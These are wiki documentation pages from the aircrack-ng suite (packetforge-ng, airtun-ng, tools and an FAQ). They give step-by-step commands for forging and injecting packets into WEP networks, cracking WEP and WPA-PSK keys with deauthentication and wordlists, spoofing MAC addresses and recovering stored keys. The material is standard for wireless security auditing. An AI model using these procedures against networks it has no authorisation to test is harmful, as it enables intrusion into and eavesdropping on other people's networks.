packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment0124-161129.xor -w arp-request

Where:

-0 indicates you want a arp request packet generated -a 00:14:6C:7E:40:80 is the Access Point MAC address -h 00:0F:B5:AB:CB:9D is the source MAC address you wish to use -k 192.168.1.100 is the destination IP. IE In an arp it is the Who has this IP -l 192.168.1.1 is the source IP. IE In an arp it is the Tell this IP -y fragment-0124-161129.xor -w arp-packet

Assuming you are experimenting with your own access point, arp request packet generated above can be decrypted with your own key. So to see that packet we just created can be decrypted: Enter airdecap-ng -w <access point encryption key> arp-request The results look like this:
Total number of packets read Total number of WEP data packets Total number of WPA data packets Number of plaintext data packets Number of decrypted WEP packets Number of decrypted WPA packets 1 1 0 0 1 0

To view the packet that was just decrypted, enter tcpdump -n -vvv -e -s0 -r arp-request-dec The results look like this:
reading from file arp-request-dec, link-type EN10MB (Ethernet) 18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1

Which is exactly what we expected. Now you can inject this arp request packet as follows aireplayng -2 -r arp-request ath0.

The program will respond as follows:

Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID Dest. MAC Source MAC 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: = = = 00:14:6C:7E:40:80 FF:FF:FF:FF:FF:FF 00:0F:B5:AB:CB:9D 0201 ffff 21ff cff5 b709 0014 ffff 781a d4d1 6c7e 8001 dc42 6743 4080 6c48 2f96 8056 000f 0000 8fcc 24ec b5ab 0999 9430 9192 cb9d 881a 144d c1e1 .A....l~@....... ........lH...... I.!.x..B/....0.M :.....gC.V$..... .O..

0841 ffff 49fc 3ab2 d64f

Use this packet ? y Saving chosen packet in replay_src-0124-163529.cap You should also start airodump-ng to capture replies. End of file.

By entering y above, the packet you created with packetforge-ng is then injected.

Usage Tips
Most access points really dont care what IPs are used for the arp request. So as a result you can use 255.255.255.255 for source and destination IPs. So the packetforge-ng command becomes:
packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment0124-161129.xor -w arp-request

Usage Troubleshooting
A common mistake people make is to include either or both -j and -o flags and create invalid packets. These flags adjust the FromDS and ToDS flages in the packet generated. Unless you are doing something special and really know what you are doing, dont use them. In general, they are not needed.

packetforge-ng.txt Last modified: 2007/01/27 20:49 by darkaudax

Airtun-ng
Description
Airtun-ng is a virtual tunnel interface creator. There are two basic functions:

Allow all encrypted traffic to be monitored for wireless Intrusion Detection System (wIDS) purposes. Inject arbitrary traffic into a network.

In order to perform wIDS data gathering, you must have the encryption key and the bssid for the network you wish to monitor. Airtun-ng decrypts all the traffic for the specific network and passes it to a traditional IDS system such as snort.

Traffic injection can be two bidirectional if you have the full encyption key. It is outgoing unidirectional if you have the PRGA obtained via chopchop or fragmentation attacks. The prime advantage of airtun-ng over the other injection tools in the aircrack-ng suite is that you may use any tool subsequently to create, inject or sniff packets. Airtun-ng only runs on linux platforms.

Usage
usage: airtun-ng <options> <replay interface>

-x nbpps : maximum number of packets per second (optional) -a bssid : set Access Point MAC address (mandatory) -i iface : capture packets from this interface (optional) -y file : read PRGA from this file (optional / one of -y or -w must be defined) -w wepkey : use this WEP-KEY to encrypt packets (optional / one of -y or -w must be defined) -t tods : send frames to AP (1) or to client (0) (optional / defaults to 0)

Scenarios
wIDS
The first scenario is wIDS. Start your wireless card in monitor mode then enter:
airtun-ng -a 00:14:6C:7E:40:80 -w 1234567890 ath0

Where:

-a 00:14:6C:7E:40:80 is the MAC address of the access point to be monitored -w 1234567890 is the encryption key ath0 is the interface currently running in monitor mode

The system responds:

created tap interface at0 WEP encryption specified. Sending and receiving frames through ath0. FromDS bit set in all frames.

You notice above that it created the at0 interface. Switch to another console sesssion and you must now bring this interface up in order to use it:
ifconfig at0 up

This interface (at0) will receive a copy of every wireless network packet. The packets will have been decrypted with the key you have provided. At this point you may any tool to sniff and analyze the traffic. For example, tcpdump or snort.

WEP injection
The next scenario is where you want to inject packets into the network. Do exactly the same steps as in the first scenario except define a valid IP address for the network when you bring the at0 interface up:

ifconfig at0 192.168.1.83 netmask 255.255.255.0 up

You can confirm this by entering ifconfig at0 and checking the output.
at0 Link encap:Ethernet HWaddr 36:CF:17:56:75:27 inet addr:192.168.1.83 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::34cf:17ff:fe56:7527/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:192 errors:0 dropped:0 overruns:0 frame:0 TX packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 RX bytes:25113 (24.5 KiB) TX bytes:516 (516.0 b)

At this point you can use any tool you want and send traffic via the at0 interface to wireless clients. Please note by default the FromDS flag is set. Meaning packets are flagged as going to the wireless clients. If you wish to communicate via the AP or wired clients, specify the option -t 1 when you start airtun-ng. IMPORTANT NOTE: The normal rules apply to injection here as well. For example, being associated with the AP, having the wireless card MAC match the injected source, etc. You have to remember to also set the at0 MAC address. An interesting use of this scenario is that it allows you to use a WEP encrypted network with a driver that supports injection, but no WEP encryption, as not all drivers support 256bit wep or 512bit WEP keys or WPA (once it is implemented) and so on.

PRGA injection
The next scenario is where you want to inject packets into the network but do not have the full WEP key. You only have the PRGA obtain via a chopchop or fragmentation attack. In this case you may only inject packets outbound. There is no way to decrypt inbound packets since you do not have the full WEP key. Start your wireless card in monitor mode then enter:
airtun-ng -a 00:14:6C:7E:40:80 -y fragment-0124-153850.xor ath0

Notice that the PRGA files was specified via the -y option. The system responds (notice it correctly states no reception):
created tap interface at0 WEP encryption by PRGA specified. No reception, only sending frames through ath0. FromDS bit set in all frames.

From here you can define a valid IP address for the network when you bring the at0 interface up:
ifconfig at0 192.168.1.83 netmask 255.255.255.0 up

You can confirm this by entering ifconfig at0. Again, at this point you can use any tool you want and send traffic via the at0 interface to wireless clients.

Connecting to Two Access Points

The next scenario is connecting to two wireless networks at the same time. This is done by simply starting airtun-ng twice and specifying the appropriate bssid MAC for each. If the 2 APs are on the same channel, then everything should be fine. If they dont share one channel, you can listen with airodump-ng on both channels (not simultaneously, but switching between only the two channels). Assuming the two APs you want to connect to are on on channels 1 and 11, enter airodump-ng -c 1,11 ath0.

So youll get two tunnel interfaces (at0 and at1), each pointing to another AP. if they dont use the same private subnet range, then you can use them at the same time. IE You are connected to more than one AP. In theory, you could do this for even more then two APs, but the quality of the link would be even worse when hopping on 3 channels.

Copy packets from the optional interface

The next scenario is copying packets from the optional interface. The -i <wireless interface> is just like the aireplay-ng -i parameter. It is used for specifying a source to read packets from, other than the given injection interface (ath0 in the examples above). A typical use is to listen with a very sensitive card on one interface and to inject with a high power adapter, which has a lower sensitivity.

Usage Tips
This tool is extremely powerful and utilizes advanced concepts. Please make sure you have built your knowledge and experience with the other tools in the aircrack-ng suite prior to using it.

Usage Troubleshooting
Windows platforms - I cant find the airtun-ng tool!. Answer: airtun-ng only runs on linux.

airtun-ng.txt Last modified: 2007/01/29 22:07 by mister_x

Tools
WZCook
It recovers WEP keys from XPs Wireless Zero Configuration utility. This is experimental software, so it may or may not work depending on your Service Pack level. WZCOOK can also display the PMK (Pairwise Master Key), a 256-bit value which is the result of the passphrase hashed 8192 times together with the ESSID and the ESSID length. The passphrase itself cant be recovered however, knowing the PMK is enough to connect to a WPA-protected wireless network with wpa_supplicant (see the Windows README). Your wpa_supplicant.conf configuration file should look like:
network={ ssid="my_essid" pmk=5c9597f3c8245907ea71a89d[...]9d39d08e

If you dont use WZC service, but you use USR Utility, get this registry value and try it here:
HKey_Current_User/Software/ACXPROFILE/profilename/dot11WEPDefaultKey1

ivstools
This tool handle .ivs files. You can either merge or convert them.

Merge
Use merge option to merge multiple .ivs files. Example:
ivstools --merge dump1.ivs dump2.ivs dump3.ivs out.ivs

It will merge dump1.ivs, dump2.ivs and dump3.ivs into out.ivs. You can merge more than 2 files, output file must be the last argument. Note: aircrack-ng is able to open multiple files (pcap or ivs)

Convert
Use convert option to convert a pcap file (by default, they have .cap extension) to a .ivs file. Example:
ivstools --convert out.cap out.ivs

It will save out.cap IVs to out.ivs Note: Kismet produce pcap files (the extension is .dump), that can be converted WARNING: pcap2ivs from aircrack, and aircrack-ng up to v0.2.1 have a bug which creates broken captures. You should not use pcap2ivs from those versions. If you have a broken IVs file from using the broken versions, then try using FixIvs to recover it.

tools.txt Last modified: 2007/02/15 22:55 by darkaudax

FAQ
What tutorials are available ?
The Tutorials page has many tutorials specific to the aircrack-ng suite. If your question is not answered on this FAQ page, be sure to check out these other resources:

The Forum User Documentation by platform (Linux, Windows)

The links page also generic wireless information and tutorials.

How do I crack a static WEP key ?

The basic idea is to capture as much encrypted traffic as possible using airodump-ng. Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run aircrack-ng on the resulting capture file. aircrack-ng will then perform a set of statistical attacks developped by a talented hacker named KoreK.

What are the authentication modes for WEP ?

There are two authentication modes for WEP:

Open System Authentication: This is the default mode. All clients are accepted by the AP, and the key is never checked meaning association is always granted. However if your key is incorrect you wont be able to receive or send packets (because decryption will fail), so DHCP, ping etc. will timeout. Shared Key Authentication: The client has to encrypt a challenge before association is granted by the AP. This mode is flawed and leads to keystream recovery, so its never enabled by default.

The NetGear Wireless Basics Manual has a good description of WEP Wireless Security including diagrams of the packet flows.

How do I know my WEP key is correct ?

Just because you seem to have successfully connected to the access point doesnt mean your WEP key is correct! To check your WEP key, the best way is to decrypt a capture file with the airdecap-ng program.

How many IVs are required to crack WEP ?

WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP (64 bit key) can be cracked with 300.000 IVs, and 104-bit WEP (128 bit key) can be cracked with 1.000.000 IVs; if youre out of luck you may need two million IVs, or more. Theres no way to know the WEP key length: this information is kept hidden and never announced, either in management or data packets; as a consequence, airodumpng can not report the WEP key length. Thus, it is recommended to run aircrack-ng twice: when you have 250.000 IVs, start aircrack-ng with -n 64 to crack 40-bit WEP. Then if the key isnt found, restart aircrack-ng (without the -n option) to crack 104-bit WEP.

How can I know what is the key length ?

You cant know whats the key lenght, theres no information at all in wireless packets, thats why you have to try differents lengths. Most of the time, its a 128 bit key.

Will WPA be cracked in the future ?

Its extremely unlikely that WPA will be cracked just like WEP was. The major problem with WEP is that the shared key is appended to the IV; the result is directly used to feed RC4. This overly simple construction is prone to a statistical attack, since the first ciphertext bytes are strongly correlated with the shared key (see Andrew Roos paper). There are basically two counter-measures against this attack: 1. Mix the IV and the shared key using a hash function or 2. Discard the first 256 bytes of RC4s output. There has been some disinformation in the news about the flaws of TKIP: For now, TKIP is reasonably secure but it is also living on borrowed time since it still relies on the same RC4 algorithm that WEP relied on.

Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key, so theres no statistical correlation at all. Furthermore, WPA provides counter-measures against active attacks (traffic reinjection), includes a stronger message integrity code (michael), and has a very robust authentication protocol (the 4-way handshake). The only vulnerability so far is a dictionnary attack, which fails if the passphrase is robust enough. WPA2 (aka 802.11i) is exactly the same as WPA1, except that CCMP (AES in counter mode) is used instead of RC4 and HMAC-SHA1 is used instead of HMAC-MD5 for the EAPOL MIC. Bottom line, WPA2 is a bit better than WPA1, but neither are going to be cracked in the near future.

How can I crack a WPA-PSK network ?

You must sniff until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay-ng. Also, a good dictionary is required. FYI, its not possible to pre-compute large tables of Pairwise Master Keys like rainbowcrack does, since the passphrase is salted with the ESSID.

Where can I find good wordlists ?

The easiest way is do an Internet search for word lists and dictionaries. Also check out web sites for password cracking tools. Many times they have references to word lists. Here are a couple of sites:

http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/ ftp://ftp.ox.ac.uk/pub/wordlists/

How do I merge multiple capture files ?

You may use File Merge... in Wireshark or Ethereal. From the command line you may use the mergecap program to merge .cap files (part of the Wireshark/Ethereal package or the win32 distribution):
mergecap -w out.cap test1.cap test2.cap test3.cap

It will merge test1.cap, test2.cap and test3.cap into out.cap You may use the ivstools program to merge .ivs files (part of aircrack-ng package)

Can I convert cap files to ivs files ?

You may use the ivstools program (part of aircrack-ng package)

Can I use Wireshark/Ethereal to capture 802.11 packets ?

Under Linux, simply setup the card in monitor mode with the airmon-ng script. Under Windows, Wireshark can capture 802.11 packets using AirPcap. Except in very rare cases, Ethereal cannot capture 802.11 packets under Windows.

Can Wireshark/Ethereal decode WEP or WPA data packets ?

Ethereal and Wireshark up to and including 0.99.4 can decrypt WEP. Go to Edit Preferences Protocols IEEE 802.11, select 1 in the WEP key count and enter your WEP key below. Wireshark 0.99.5 and above can decrypt WPA as well. Go to Edit Preferences Protocols IEEE 802.11, select Enable decryption, and fill in the key according to the instructions in the preferences window. You can also select Decryption Keys... from the wireless toolbar if its displayed.

What are the different wireless filter expressions ?

The Wireshark display filter reference lists wlan (general 802.11), wlan_mgmt (802.11 management), wlancap (AVS capture header), wlancertextn (802.11 certificate extensions), and radiotap (radiotap header) (Ethereal Wireless Filters from www.remote-exploit.org)

How do I decrypt a capture file ?

You may use the airdecap-ng program

How do I change my card's MAC address ?

Under linux, the following information applies. One method is:
ifconfig ath0 down ifconfig ath0 hw ether 00:11:22:33:44:55 ifconfig ath0 up

Be aware that the example above does not work with every driver. The easier way is to use the macchanger package. The documentation and download is at: http://www.alobbs.com/macchanger This link tends to be slow or not answer. You can do an Internet search for macchanger or here are some alternate links:

http://mirrors.usc.edu/pub/gnu/macchanger/ http://ftp.gnu.org/gnu/macchanger/ http://ftp.azc.uam.mx/mirrors/gnu/macchanger/

Here are scripts which use the macchanger package and work well with madwifi-ng drivers: Script 1 - Invoked with macc.sh XX:XX:XX:XX:XX:XX
#!/bin/sh cardctl eject cardctl insert wlanconfig ath0 destroy ifconfig wifi0 up ifconfig wifi0 down macchanger wifi0 -m $1 wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Script 2
#!/bin/sh # Change the following variables to match your requirements FAKEMAC="00:14:6C:71:41:32" IFACE="ath0" WIFACE="wifi0" # # The interface is brought up and down twice otherwise # it causes a system exception and the system freezes # ifconfig $IFACE down wlanconfig $IFACE destroy wlanconfig $IFACE create wlandev $WIFACE wlanmode monitor ifconfig $IFACE up ifconfig $IFACE down macchanger $WIFACE -m $FAKEMAC wlanconfig $IFACE destroy wlanconfig $IFACE create wlandev $WIFACE wlanmode monitor ifconfig $IFACE up ifconfig $IFACE iwconfig echo " " echo "The wireless card MAC has been set to $FAKEMAC" echo " "

Under Windows, you may use:

macmakeup Technitium MAC Address Changer ChangeMacAddress (There is cost for this product)

Troubleshooting Tip: A normal MAC address looks like this: 00:09:5B:EC:EE:F2. The first half (00:09:5B) of each MAC address is the manufactuer. The second half (EC:EE:F2) is unique to each network card. Many access points will ignore invalid MAC addresses. So make sure to use a valid wireless card manufacturer code when you make up MAC addresses. Otherwise your packets may be ignored.

Is my card compatible with airodump-ng / aireplay-ng ?

First of all, search Google to find which chipset your card has. For example, if you have a Linksys WPC54G search for wpc54g chipset linux. Then check it in compatibility_drivers

Can I have multiple instance of aireplay-ng running at the same time?

Yes, you can.

How to use spaces, double quote and single quote in AP names?

You have to prefix those special characters whith a \.

What is the best transmit power?

see Various tips

What is the size of ARP packets ?

When captured through a wireless interface, 68 bytes is typical for arp packets originating from wireless clients. 86 bytes is typical for arp requests from wired clients. On Ethernet, ARP packets when received are typically 60 bytes long. When this is then relayed by a wireless access point, they are 86 bytes. This is, of course, because of the wireless headers. If a wireless client sends an ARP, they are typically 42 bytes long and they become 68 when relayed by the AP.

How can I resolve MAC addresses to IP addresses ?

You can try netdiscover or ARP tools

What are the allowed rates ?

Modulation Allowed rates

DSSS / CCK 1M, 2M, 5.5M, 11M OFDM (a/g) 6M, 9M, 12M, 24M, 36M, 48M, 54M

How do I recover my WEP/WPA key in windows ?

You have to use WZcook

How can I force loading of the orinoco driver instead of Hostap or force Hostap/wlan-ng instead of orinoco ?
You have to edit pcmcia-cs configs. See /etc/pcmcia/config and related files in that directory. Example (force HostAP instead of orinoco):

Edit /etc/pcmcia/config Add a new device if doesnt already exist

device "hostap_cs" class "network" module "hostap_cs"

Find your cards name. In my case a DWL-650. If you dont find it, find a card that has the same pciid of yours (you can also add an entry in config.opts if you want to do it cleanly) In bind, replace orinoco_cs by hostap_cs Save changes and close the file Unplug all pcmcia cards using cardctl eject Restart pcmcia service

/etc/init.d/pcmcia restart

Replug your card, and voil

Why do I have wlan0 and wifi0 when hostAP is loaded?

From the hostAP readme: Unlike most Linux network drivers, Host AP driver creates multiple network devices. wifi0 (or wifi# if you have multiple cards) is the master interface for the radio device. It uses IEEE 802.11 headers and is used internally by the driver to process frames to and from other interfaces. wlan0 is the default data interface. It is the interface that is used in most configurations, e.g., it is configured with an IP address and iwconfig commands can be used with it. When using WDS, each link will create a new virtual device (wlan0wds0).

Aireplay-ng doesn't inject packets

Possible reason:

Your card cannot inject packets (see Install drivers) Bad driver (try reinstalling them. BTW, upgrade them to the latest version) Driver not patched (also see Install drivers). Pay attention, drivers given with your distro are NOT patched. Youre too far, the access point or the client cannot get your packets Signal is too weak (dont forget that WiFi uses radio waves) The client or the access point is protected

What is the frequency for each channel?

To determine the frequency that a channel uses (or vice versa), check out: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select the Wifi Channel Selection and Channel Overlap tab.

How do I convert the HEX characters to ASCII?

Here are some conversion links. Remember to put % in front of each hex character when going from hex to ascii.

http://centricle.com/tools/ascii-hex/ http://www.mikezilla.com/exp0012.html http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html

How do I learn more about WPA/WPA2?

See the links page.

Does the aircrack-ng suite support Airpcap adaptor?

See airpcap.

I can't seem to capture any IVs !

As a reminder, it doesnt work at all with ndiswrapper. Possible reasons:

You are standing too far from the access point. There is no traffic on the target wireless network. There is some G traffic but youre capturing in B mode. Something is wrong with your card (firmware problem ?) By the way, beacons are just unencrypted announcement packets. Theyre totally useless for WEP cracking.

I can't inject packets

As a reminder, you cant inject with a Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell or Broadcom chipset because of firmware and/or driver limitations. Note: You cant inject with OpenWrt devices (This news is an april fool, see post date) If your chipset supports injection, you can try the following:

Be closer (but not too much, it will be explained later) to the Access Point. Decrease the speed for injection and/or the bitrate with which your card is operating. (iwconfig <interface> rate 1M) Your driver may be not patched or not up to date. You should always take the latest CVS/SVN revision if it exist (see Drivers). See also previous question.

I have more than one million IVs, but aircrack-ng doesn't find the key !
Possible reasons:

Out of luck: you must capture more IVs. Usually, 104-bit WEP can be cracked with about one million IVs, but sometimes more IVs are needed. If all votes seem equal, or if there are many negative votes, then the capture file is corrupted, or the key is not static (EAP/802.1X in use ?). A false positive prevented the key from being found. Try to disable each korek attack (-k 1 .. 17), raise the fudge factor (-f) or try the experimental bruteforce attacks (-x / -y).

I've been unable to crack this AP !

Well, it happens. Last thing you can try is asking the key to the network owner ;)

I have a Prism2 card, but airodump-ng / aireplay-ng doesn't seem to work !

First step, make sure you arent using the orinoco driver. If the interface name is wlan0, then the driver is HostAP or wlan-ng. However if the interface name is eth0 or eth1, then the driver is orinoco and you must disable the driver (use cardctl ident to know you card identifier, then edit /etc/pcmcia/config, replace orinoco_cs with hostap_cs and restart cardmgr).

Also, it can be a firmware problem. Old firmwares have trouble with test mode 0x0A (used by the HostAP / wlan-ng injection patches), so make sure yours is up to date (see Prism2 flashing for instructions). The recommended station firmware version is 1.7.4. If it doesnt work well (kismet or airodump-ng stalls after capturing a couple of packets), try STA 1.5.6 instead (either s1010506.hex for old Prism2 cards, or sf010506.hex for newer ones). On a side note, test mode 0x0A is somewhat unstable with wlan-ng. If the card seems stuck, you will have to reset it, or use HostAP instead. Injection is currently broken on Prism2 USB devices with wlan-ng.

I have an Atheros card, and the madwifi patch crashes the kernel / aireplay-ng keeps saying enhanced RTC support isn't available
There are quite a few problems with some versions of the Linux 2.6 branch (especially before 2.6.11 was released) that will cause a kernel panic when injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support is just broken. Thus, is it highly recommended to use either Linux 2.6.11.x or newer.

Airodump-ng freeze when I change injecting rate, what can I do ?

You have 2 workarounds:

Change the rate before using airodump-ng Restart airodump-ng

The PEEK driver does not recognize my card

Some cards are not recognized by the Windows drivers above, even though they have the correct chipset. In this case, open the hardware manager, select your card, Update the driver, select Install from a specific location, select Dont search, I will choose the driver to install, click Have disk, set the path to where the driver has been unzipped, uncheck Show compatible hardware, and finally choose the driver.

Why do I get Error: packet length < 30 bytes ?

It was due to the use of madwifi-ng with aircrack and aircrack-ng up to 0.2.1

Why do I have bad speeds when i'm too close to the access point?
Problem: The wireless card behaves badly if the signal is too strong. If Im too close (1-2m) to the access point, I get high quality signal but actual transmission rates drop (down to 5-11Mbps or less). The net result is TCP throughput of about 600KB/s. This is called antenna and receiver saturation. The signal coming in to the preamplifier is too strong and clips the input of the amplifier, causing signal degradation. This is a normal phenomenon with most 802.11 hardware.

Is it a driver problem or is it my network hardware?

Neither, really. Its a physics problem. The only solution is to either decrease transmission power, use an antenna with a lower gain factor, or move the access point farther away from the station. You should use wired ethernet when youre close to the access point. If you dont want or you dont have a wire, you can also decrease output power of your Access point or your card.

How do I download and compile aircrack-ng?

See the downloads page.

The driver won't compile

This usually happens because the linux headers dont match your current running kernel. In this situation, grab the kernel sources or just recompile a fresh kernel, install it and reboot. Then, try again compiling the driver. See this HOWTO for more details about kernel compilation.

Why can't I compile airodump-ng and aireplay-ng on BSD / Mac OS X / Other OS ?

Both airodump-ng and aireplay-ng sources are Linux-specific.

Why do I get ioctl(SIOCGIFINDEX) failed: No such device ?

Double check that your device name is correct and that you havent forgotten a parameter on the command line. When using linux-wlan-ng driver, be sure to enable the interface first with airmonng.

Why when i use aircrack-ng over a .ivs file i get lots of random BSSID ?
If the .ivs file was generated using pcap2ivs from aircrack (any version) or aircrack-ng (up to 0.2.1). It is corrupted by a bug in those versions. You should upgrade to aircrack-ng 0.3 or more. You can try to recover part of the information using FixIvs.

Why aircrack-ng stalls while reading a .ivs file and does not start cracking ?
Your .ivs file may have been corrupted if you used pcap2ivs. Read previous point.

Why does airodump-ng stop capturing packets after a few seconds ?

wpa_supplicant or a network manager may be running and try to get connected to an Access Point. You should stop it before running airodump-ng.

Why does my computer locks up when injecting packets ? Is there a solution?

See http://tinyshell.be/aircrackng/forum/index.php?topic=901.0

Is VMware supported?
At this point, there is only sketchy unconfirmed information about the aircrack-ng suite running under VMware. One thing about doing VMware, you cant use PCMCIA cards with fedora (and maybe other distros) that is running inside of VMWare (at least last the last time the forums at remoteexploit were reviewed). You should be able to make use of internal cards and some USB wireless cards but you limited on your antenna choices at that point. Some people modify their USB cards to allow for external antenna. If anyone has hands-on experience, please post the Forum so the information may be shared with everyone.

What other tips do you have?

Various tips

faq.txt Last modified: 2007/02/16 01:08 by darkaudax